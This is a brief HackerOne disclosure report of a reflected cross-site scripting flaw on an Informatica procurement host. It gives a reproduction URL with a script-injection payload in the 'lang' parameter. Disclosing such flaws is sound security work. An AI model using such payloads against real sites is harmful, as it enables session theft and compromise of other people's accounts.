Informatica: RXSS in http://procurement-businesscatalog.informatica.com

2020-03-26T04:38:10
ID H1:831803
Type hackerone
Reporter min4tor
Modified 2020-03-27T10:04:59

Description

Hi, this is a simple XSS in the host below:

Reproduction Steps Visit the following URL: http://procurement-businesscatalog.informatica.com/JPBC/login.hbc?lang=%3C/SCRIPT%3E%3CSCRIPT%3Ealert(document.domain);%3C/SCRIPT%3E

{F760997}

Impact

Standard XSS impact.